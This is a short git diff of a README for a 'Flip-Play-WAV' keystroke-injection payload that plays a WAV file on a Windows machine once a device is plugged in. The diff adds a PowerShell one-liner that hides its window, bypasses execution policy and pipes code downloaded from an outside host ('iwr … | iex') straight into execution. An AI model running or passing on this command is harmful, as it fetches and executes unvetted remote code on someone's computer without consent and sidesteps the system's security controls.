diff --git a/Payloads/Flip-Play-WAV/README.md b/Payloads/Flip-Play-WAV/README.md index 07fc92e..f80f0a1 100644 --- a/Payloads/Flip-Play-WAV/README.md +++ b/Payloads/Flip-Play-WAV/README.md @@ -28,15 +28,16 @@ After one is the WAV file will be played. ### Dependencies -* DropBox - Your Shared link for the intended file * Windows 10,11
### Executing program +* Place the WAV Url in the $wav variable * Plug in your device * Invoke-WebRequest will be entered in the Run Box to download your WAV file + ``` powershell -w h -NoP -NonI -Ep Bypass $wav='';iwr https://jakoby.lol/vus | iex ```